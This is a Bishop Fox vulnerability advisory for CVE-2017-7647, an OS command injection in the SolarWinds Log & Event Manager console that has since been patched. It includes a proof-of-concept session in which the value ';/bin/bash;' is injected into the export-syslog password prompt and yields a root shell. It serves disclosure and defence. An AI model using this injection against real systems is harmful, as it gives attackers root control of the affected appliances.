SolarWinds Log & Event Manager - Arbitrary Command Injection

By:
Gauge showing high severity reading

Share

Patch Date

April 10, 2017

Reported Date

February 7, 2017

Vendor

SolarWinds

Systems Affected

SolarWinds Log & Event Manager (LEM) before 6.3.1 Hotfix 4

Summary

The Bishop Fox assessment team discovered an arbitrary command injection vulnerability within the SolarWinds’ Log & Event Manager (LEM) management console (CMC). The CMC is a restricted environment providing functionality for upgrading or maintaining LEM appliances. This vulnerability allows an authenticated user to bypass restrictions imposed by the CMC and execute arbitrary commands on the vulnerable system as the root user.

Vendor Status

The vendor has been notified and has issued patches.

Exploit Availability

To demonstrate the impact of this vulnerability, the assessment team injected syntax to break out of the LEM application and execute a system shell:

cmc> appliance

cmc::acm# exportsyslog

Press <enter> to begin export syslog process.

Available Log Files:  

1. ( 53 kB) Authentication log
…omitted for brevity…
Log groups selected: 1 ( 1 kB )
Select log files to include (q to quit, * for all, n for none, twice to toggle): q
Please enter the network share path (e.g. \\myserver\myshare): \\server\share
Is the path \\server\share correct? <Y/n>
Please enter the username, including any domain information (e.g. DOMAIN\user): mydomain\user
Is the user mydomain\user correct? <Y/n>
Please enter the password: ‘;/bin/bash;’
Please verify the password: ‘;/bin/bash;’
Creating logfile archive...done.
Usage: smbclient [-?EgBVNkPeC] [-?|--help] [--usage]
[-R|--name-resolve=NAME-RESOLVE-ORDER] [-M|--message=HOST]
…omitted for brevity…
[-C|--use-ccache] service <password>
--(0)-[10.1.60.211]-[6.3.1]-[root@swi-lem]--
/usr/local/contego # id
uid=0(root) gid=0(root) groups=0(root)
--(0)-[10.1.60.211]-[6.3.1]-[root@swi-lem]--
/usr/local/contego # uname -a

As shown in this above proof of concept, the research team fully compromised the affected system by exploiting this vulnerability.

Researcher

Baker Hamilton, MD, MMSc of Bishop Fox

For Reference

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

CVE – CVE-2017-7647

LEM V6.3.1 HOT FIX 4 IS NOW AVAILABLE

The team at Bishop Fox would like to thank SolarWinds for their cooperation in quickly resolving this matter!

Subscribe to Bishop Fox's Security Blog

Be first to learn about latest tools, advisories, and findings.

Default fox headshot blue

About the author, Baker Hamilton

Contractor

Baker Hamilton, MD, MMSc (OSCE, OSCP) is a Bishop Fox alumnus who focused on application penetration testing, internal and external network penetration testing, source code review, and red teaming.

More by Baker

Recommended Posts

You might be interested in these related posts.

Nov 01, 2024

A Brief Look at FortiJump (FortiManager CVE-2024-47575)

Jul 02, 2024

Traeger Grill D2 Wi-Fi Controller, Version 2.02.04

Jun 17, 2024

ExpressionEngine, Version 7.3.15

May 06, 2024

OOB Memory Read: Netscaler ADC and Gateway

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.